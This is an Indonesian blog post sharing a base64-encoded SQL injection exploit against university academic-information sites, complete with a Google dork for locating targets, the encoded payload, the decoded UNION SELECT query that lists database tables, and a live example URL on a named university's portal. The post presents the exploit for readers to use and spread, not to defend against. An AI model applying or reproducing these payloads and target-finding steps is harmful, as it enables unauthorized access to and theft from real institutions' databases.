Base64 SQL Injection pada Situs Akademik Indonesia

Tadi malam iseng jalan jalan di salahsatu grup underground terkenal di Indonesia, dan ada yang share ‘bug’ SQLi base64 pada banyak situs akademik (ac.id). Query nya pun hampir sama semua. Sehingga saat kalian menemukan situs yang memiliki celah ini, cukup memasukkan ‘exploit’ nya , dan isi database akan kelihatan.

See how its work :
# Exploit Title: Indonesian University Base64 SQL Injection
# Google Dork: news/berita-kampus-MQ== ( use your brain b!tch )
# Date: [04 – 05 – 2016 23:51]
# Exploit Author: Defacer Tersakiti
# Tested on: Ubuntu Linux, Windows

Exploit :

  • LTEnIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUsMHgzYzYyNzIzZSksNCw1LDYsNyw4LDkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpLS0gLQ==

Simple Exploit

Kita ambil contoh situs Siakad Universitas Kanjuruhan Malang :

  • http://siakad.unikama.ac.id/index.php/news/berita-kampus-MQ==

Sekarang ganti MQ== dengan query injection diatas :

  • http://siakad.unikama.ac.id/index.php/news/berita-kampus-LTEnIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUsMHgzYzYyNzIzZSksNCw1LDYsNyw4LDkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpLS0gLQ==

Boom… database kebuka.

Oke disini saya akan menjelaskan bagaimana cara kerja nya :

diatas ada kode MQ== . MQ== adalah bentuk base64 dari 1 .
Silahkan didecode di situs online atau kalau kalian menggunakan linux bisa test via terminal.

base64 -d <<< MQ==

Maka outpunya adalah angka 1.
Nah, sekarang kita ganti MQ== dengan MSc= maka isi berita nya akan blank. Kenapa MSc= ? MSc= adalah bentuk encode base64 dari 1′ .

[email protected]:~$ echo -n "1'" | base64
MSc=
Yup, kita memberi string dibelakang angka untuk mengecek apakah error atau tidak.
Nah sekarang kalian tau kan kode exploit diatas berasal dari mana. Yup, dari hasil encode query berikut :
  • -1′ UNION SELECT 1,2,group_concat(table_name,0x3c62723e),4,5,6,7,8,9 from information_schema.tables where table_schema=database()– –

Oke mungkin sekian dulu penjelasan singkat dari saya.
Untuk dasar SQL Injection Base64 bisa dilihat disini :
SQL Injection Base64 Tutorial

baiklah sekian dulu post kali ini, sihalkan dikembangkan, jika ada kebingungan silahkan komentar. Share juga ke teman temanmu biar mereka tau.

Shares

12 Comments

Leave a Reply